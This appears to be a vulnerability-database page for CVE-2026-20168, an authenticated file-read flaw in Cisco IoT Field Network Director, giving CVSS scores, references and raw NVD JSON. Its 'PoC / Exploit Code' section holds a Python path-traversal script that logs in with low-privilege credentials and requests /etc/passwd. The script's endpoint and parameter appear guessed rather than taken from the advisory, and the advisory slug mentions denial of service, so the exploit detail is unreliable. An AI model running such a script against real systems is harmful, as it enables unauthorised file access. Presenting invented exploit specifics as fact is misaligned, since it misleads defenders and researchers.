CVE-2026-20168

Description

A vulnerability in the web-based management interface of Cisco IoT Field Network Director could allow an authenticated, remote attacker with low privileges to retrieve files that they do not have permission to access. This vulnerability is due to insufficient file access checks. An attacker could exploit this vulnerability by submitting crafted input in the web-based management interface. A successful exploit could allow the attacker to read files that they are not authorized to access.

CVSS Details

CVSS Score

6.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

具体版本请参考 Cisco 安全公告 cisco-sa-iot-fnd-dos-n8N26Q4u

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Target URL
url = "https://target-ip/management/interface"

# Attacker credentials (low privilege)
credentials = {
    "username": "low_priv_user",
    "password": "password"
}

# Start a session to maintain authentication
session = requests.Session()

# 1. Login to get authenticated session
login_resp = session.post(url + "/login", data=credentials)
if login_resp.status_code != 200:
    print("Login failed")
    exit()

# 2. Exploit: Craft payload to read sensitive file (e.g., /etc/passwd)
# The payload attempts to traverse directories using '../'
payload = {
    "file_path": "../../../../../etc/passwd"
}

# 3. Send malicious request
exploit_resp = session.get(url + "/file_download", params=payload)

# 4. Check result
if exploit_resp.status_code == 200 and "root:" in exploit_resp.text:
    print("[+] Vulnerability exploited successfully!")
    print("File content:")
    print(exploit_resp.text)
else:
    print("[-] Exploit failed or file not found.")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-20168
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-20168
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-20168/
[4] VulDB https://vuldb.com/cve/CVE-2026-20168
[5] https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iot-fnd-dos-n8N26Q4u

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-20168", "sourceIdentifier": "[email protected]", "published": "2026-05-06T17:16:20.590", "lastModified": "2026-05-06T18:59:53.230", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability in the web-based management interface of Cisco IoT Field Network Director could allow an authenticated, remote attacker with low privileges to retrieve files that they do not have permission to access.\r\n\r\nThis vulnerability is due to insufficient file access checks. An attacker could exploit this vulnerability by submitting crafted input in the web-based management interface. A successful exploit could allow the attacker to read files that they are not authorized to access."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-388"}]}], "references": [{"url": "https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iot-fnd-dos-n8N26Q4u", "source": "[email protected]"}]}}